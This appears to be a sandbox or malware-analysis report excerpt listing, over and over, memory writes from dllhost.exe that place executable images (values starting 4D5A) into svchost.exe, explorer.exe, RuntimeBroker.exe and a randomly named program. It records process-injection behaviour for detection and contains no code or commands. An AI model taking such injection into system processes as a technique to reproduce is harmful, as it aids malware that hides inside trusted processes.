Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADECD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 9070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 9070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2045C3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23023330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A71C3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000 value starts with: 4D5A
